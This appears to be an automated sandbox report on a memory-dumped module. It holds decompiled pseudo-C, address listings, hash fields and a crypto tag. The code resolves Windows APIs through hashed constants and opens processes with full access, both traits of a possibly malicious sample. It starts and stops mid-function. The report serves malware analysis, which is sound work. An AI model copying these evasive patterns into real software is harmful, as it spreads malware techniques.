								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6E70F584(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6E70F584(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6e71b808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6E713064(0x60a28c5c, 0x14e85b34);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6E70F4BC( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6E70F4BC( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6E70B5C4(_t439 + 0x34);
											E6E70B5C4(_t439 + 8);
											goto L65;
										}
										L62:
										E6E70B5C4(_t439 + 0x34);
										E6E70B5C4(_t439 + 8);
										goto L63;
									}
									_t392 = E6E70F4BC(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6E70CA8C(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6E70C280(_t324);
									if(__eflags != 0) {
										break;
									}
									E6E70F828(_t439 + 0x14, E6E70F4CC(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6E70F4BC(_t439 + 0x14, E6E70F4CC(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6E713064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6E70F828(_t439 + 0x40, E6E70F4CC(_t439 + 0x3c) + 4);
											 *(E6E70F4BC(_t439 + 0x40, E6E70F4CC(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6E70CD24(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6E70F4BC( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6E70F4BC(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6E70AC48(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6E70CD24(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6E70F4BC( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6E70F4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6E70F4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6E70F4BC( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6E70F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6E7138F0( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6E70F4CC( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6E70F828( *((intOrPtr*)(_t439 + 8)), E6E70F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6E70F4CC( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6E70F4CC( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6E70F4BC( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6E70F4BC( *((intOrPtr*)(_t439 + 4)), _t413);
										E6E7138F0(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6E70F4CC( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6E70F828( *((intOrPtr*)(_t439 + 4)), E6E70F4CC( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6E70F828( *((intOrPtr*)(_t439 + 8)), E6E70F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6E70F4BC( *((intOrPtr*)(_t439 + 8)), E6E70F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6E70F828( *((intOrPtr*)(_t439 + 4)), E6E70F4CC( *_t439) + 4);
								 *(E6E70F4BC( *((intOrPtr*)(_t439 + 4)), E6E70F4CC( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6E70F4BC(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6E713064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6E70F4BC(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6E70F828( *((intOrPtr*)(_t439 + 8)), E6E70F4CC( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6E70F4BC( *((intOrPtr*)(_t439 + 8)), E6E70F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6E70F4BC(_t439 + 0x28,  *(_t439 + 0x70));
										E6E70F828( *((intOrPtr*)(_t439 + 4)), E6E70F4CC( *_t439) + 4);
										 *(E6E70F4BC( *((intOrPtr*)(_t439 + 4)), E6E70F4CC( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E70F4BC( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6E70F4BC( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6E70F4CC( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6E70F4CC( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6E70F4BC( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6E70F4BC( *((intOrPtr*)(_t439 + 4)), _t420);
										E6E7138F0( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6E70F4CC( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6E70F828( *((intOrPtr*)(_t439 + 4)), E6E70F4CC( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6E713064(0x60a28c5c, 0xe96b154c);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6E70F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6E70F4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6E70F4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6E70F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6E70F4BC( *((intOrPtr*)(_t439 + 8)), _t422);
										E6E7138F0( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6E70F4CC( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6E70F828( *((intOrPtr*)(_t439 + 8)), E6E70F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E70F4BC(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x6e70a4f2
0x6e70a4f4
0x6e70a4ff
0x6e70a505
0x6e70a509
0x6e70a50e
0x6e70a514
0x6e70a524
0x00000000
0x6e70a526
0x6e70a526
0x6e70a531
0x6e70a531
0x6e70aaaf
0x6e70aab1
0x6e70aab2
0x6e70aaf1
0x6e70aaf5
0x6e70ab03
0x6e70ab11
0x6e70ab11
0x6e70aafc
0x6e70ab17
0x6e70ab1c
0x00000000
0x6e70ab1c
0x6e70ab00
0x6e70ab01
0x00000000
0x6e70a53b
0x6e70a53b
0x6e70a53f
0x6e70a646
0x6e70a646
0x6e70a64b
0x6e70a75c
0x6e70a760
0x6e70a765
0x6e70a769
0x6e70a893
0x6e70a895
0x6e70a899
0x6e70a8a2
0x6e70a8ab
0x6e70a8af
0x6e70a8b8
0x6e70a8bf
0x6e70a8c0
0x6e70a8c4
0x6e70a8c8
0x6e70a8cc
0x6e70a8ce
0x6e70aa38
0x6e70aa38
0x6e70aa40
0x6e70aa58
0x6e70aa5a
0x6e70aa5c
0x6e70aa96
0x6e70aa96
0x6e70aa98
0x6e70aa98
0x6e70aa9b
0x6e70aab6
0x6e70aaca
0x6e70aacd
0x6e70aad2
0x6e70aadd
0x6e70aade
0x6e70aae1
0x6e70aae3
0x6e70aaec
0x00000000
0x6e70aaec
0x6e70aa9d
0x6e70aaa1
0x6e70aaaa
0x00000000
0x6e70aaaa
0x6e70aa6d
0x6e70aa7d
0x6e70aa81
0x6e70aa81
0x6e70aa84
0x6e70aa87
0x6e70aa8a
0x6e70aa90
0x00000000
0x00000000
0x00000000
0x6e70aa92
0x6e70a8d6
0x6e70a8d6
0x6e70a8d8
0x6e70a8dc
0x6e70a8e1
0x6e70a8e3
0x6e70a8e7
0x6e70a8ea
0x6e70a8f2
0x6e70a8f4
0x00000000
0x00000000
0x6e70a90b
0x6e70a926
0x6e70a928
0x6e70a93b
0x6e70a93d
0x6e70a93f
0x6e70a95a
0x6e70a95a
0x6e70a95e
0x6e70a960
0x00000000
0x00000000
0x6e70a962
0x6e70a965
0x6e70a986
0x6e70a9a5
0x6e70a9ab
0x6e70a9ae
0x6e70a9b3
0x6e70a9b4
0x6e70a9b8
0x00000000
0x00000000
0x6e70a9c0
0x6e70a9c0
0x6e70a9c2
0x6e70a9ce
0x6e70a9da
0x6e70a9e4
0x6e70a9e7
0x6e70a9ea
0x6e70a9ee
0x6e70a9f5
0x6e70a9f9
0x6e70a9fd
0x6e70a9fe
0x6e70aa02
0x6e70aa07
0x6e70aa0c
0x6e70aa10
0x6e70aa14
0x6e70aa1a
0x6e70aa20
0x6e70aa26
0x6e70aa2c
0x6e70aa31
0x6e70aa32
0x6e70aa32
0x00000000
0x6e70a9c2
0x00000000
0x6e70a965
0x6e70a943
0x6e70a954
0x6e70a956
0x6e70a958
0x00000000
0x00000000
0x00000000
0x6e70a958
0x6e70a96b
0x00000000
0x6e70a96b
0x6e70a76f
0x6e70a772
0x6e70a774
0x00000000
0x00000000
0x6e70a77c
0x6e70a77c
0x6e70a77e
0x6e70a77e
0x6e70a78f
0x6e70a791
0x6e70a794
0x00000000
0x00000000
0x6e70a88a
0x6e70a88b
0x6e70a88d
0x00000000
0x00000000
0x00000000
0x6e70a88d
0x6e70a79a
0x6e70a79d
0x6e70a7a7
0x6e70a7ac
0x6e70a7ae
0x6e70a7b4
0x6e70a7bb
0x6e70a7bf
0x6e70a7c4
0x6e70a7c8
0x6e70ac03
0x6e70ac17
0x6e70ac3a
0x6e70ac3f
0x6e70ac3f
0x6e70a7df
0x6e70a7e4
0x6e70a7e4
0x6e70a7e4
0x6e70a7e4
0x6e70a7ea
0x6e70a7ef
0x6e70a7f1
0x6e70a7f6
0x6e70a7fd
0x6e70a802
0x6e70a804
0x6e70abc1
0x6e70abd2
0x6e70abec
0x6e70abf1
0x6e70abf1
0x6e70a81a
0x6e70a81f
0x6e70a81f
0x6e70a81f
0x6e70a81f
0x6e70a833
0x6e70a851
0x6e70a856
0x6e70a866
0x6e70a883
0x6e70a885
0x6e70a885
0x00000000
0x6e70a79d
0x6e70a653
0x6e70a653
0x6e70a655
0x6e70a65c
0x6e70a66a
0x6e70a66c
0x6e70a66f
0x6e70a676
0x6e70a678
0x6e70a6a9
0x6e70a6b8
0x6e70a6ba
0x6e70a6bc
0x6e70a6da
0x6e70a6dc
0x6e70a6de
0x6e70a6f1
0x6e70a710
0x6e70a716
0x6e70a719
0x6e70a730
0x6e70a74c
0x6e70a74e
0x6e70a74e
0x6e70a74e
0x6e70a74e
0x6e70a6de
0x00000000
0x6e70a6bc
0x6e70a67c
0x6e70a67c
0x6e70a67e
0x6e70a68f
0x6e70a691
0x6e70a693
0x00000000
0x00000000
0x6e70a69f
0x6e70a6a0
0x6e70a6a7
0x00000000
0x00000000
0x00000000
0x6e70a6a7
0x6e70a695
0x6e70a698
0x00000000
0x00000000
0x6e70a751
0x6e70a751
0x6e70a752
0x6e70a752
0x00000000
0x6e70a545
0x6e70a547
0x6e70a547
0x6e70a549
0x6e70a550
0x6e70a55e
0x6e70a560
0x6e70a564
0x6e70a568
0x6e70a56a
0x6e70a598
0x6e70a59b
0x6e70a5a0
0x6e70a5a4
0x6e70a5a9
0x6e70a5b0
0x6e70a5b5
0x6e70a5b7
0x6e70ab7e
0x6e70ab8f
0x6e70abaf
0x6e70abb4
0x6e70abb4
0x6e70a5cd
0x6e70a5d2
0x6e70a5d2
0x6e70a5d2
0x6e70a5d2
0x6e70a5e4
0x6e70a5e6
0x6e70a5e8
0x6e70a5f9
0x6e70a5f9
0x6e70a5ff
0x6e70a604
0x6e70a608
0x6e70a60e
0x6e70a615
0x6e70a61a
0x6e70a61c
0x6e70ab32
0x6e70ab43
0x6e70ab64
0x6e70ab69
0x6e70ab69
0x6e70a633
0x6e70a638
0x6e70a638
0x6e70a638
0x6e70a638
0x6e70a63b
0x6e70a63b
0x00000000
0x6e70a63b
0x6e70a56e
0x6e70a56e
0x6e70a570
0x6e70a581
0x6e70a583
0x6e70a585
0x00000000
0x00000000
0x6e70a591
0x6e70a592
0x6e70a596
0x00000000
0x00000000
0x00000000
0x6e70a596
0x6e70a587
0x6e70a58a
0x00000000
0x00000000
0x6e70a63c
0x6e70a63c
0x6e70a63d
0x6e70a63d
0x00000000
0x6e70a549
0x6e70a53f

Strings

, xrefs: 6E70AAF7

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 48006bb688c8568272e06b6233d7152637ba21f9be9ceac198b74957dbe4a575
Instruction ID: b2e5c46ba969afb4fcc11dc2b088d1a095ea1ba8ad78341477d3245b3e61d701
Opcode Fuzzy Hash: 48006bb688c8568272e06b6233d7152637ba21f9be9ceac198b74957dbe4a575
Instruction Fuzzy Hash: A712A4B15083019FC754DFA4CA84AAEB7E9EF84714F108E2DF999972B1DB309D01CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6E708428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6E708428(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E6E70B658(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E6E70F4D0(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E6E70F654(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E6E712234(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E6E70F654(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E6E70F584(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E6E70F584(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E6E70F4BC(_t449 + 0x14, 0);
									_t180 = E6E712908( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E6E70B5C4(_t449 + 0x34);
										E6E70B5C4(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6E70F4BC( *(_t449 + 4), _t315 << 2)));
										_t188 = E6E70F4BC( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E6E70B5C4(_t449 + 0x34);
										E6E70B5C4(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E6E70CA8C(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E6E70C280(_t343);
									if(__eflags != 0) {
										break;
									}
									E6E70F828(_t449 + 0x14, E6E70F4CC(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E6E70F4BC(_t449 + 0x14, E6E70F4CC(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E6E713064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E6E70F828(_t449 + 0x40, E6E70F4CC(_t449 + 0x3c) + 4);
											 *(E6E70F4BC(_t449 + 0x40, E6E70F4CC(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E6E70CD24(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E6E70F4BC( *(_t449 + 4), _t431 * 4);
												_t212 = E6E70F4BC(_t449 + 0x40, _t431 * 4);
												E6E708B58( *_t211, E6E7102B0(0x60a28c5c, 0x840d15ae),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E6E70CD24(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E6E70F4BC(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E6E70F4CC( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E6E70F4CC( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E6E70F4BC( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E6E70F4BC( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E6E7138F0( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6E70F4CC( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E6E70F828( *(_t449 + 4), E6E70F4CC( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E6E70F4CC(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E6E70F4CC(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E6E70F4BC(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E6E70F4BC(_t322, _t430);
										E6E7138F0(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6E70F4CC(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E6E70F828(_t322, E6E70F4CC(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6E70F828( *(_t449 + 4), E6E70F4CC( *_t449) + 4);
								 *(E6E70F4BC( *(_t449 + 4), E6E70F4CC( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E6E70F828(_t322, E6E70F4CC(_t322) + 4);
								 *(E6E70F4BC(_t322, E6E70F4CC(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E6E70F4BC(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
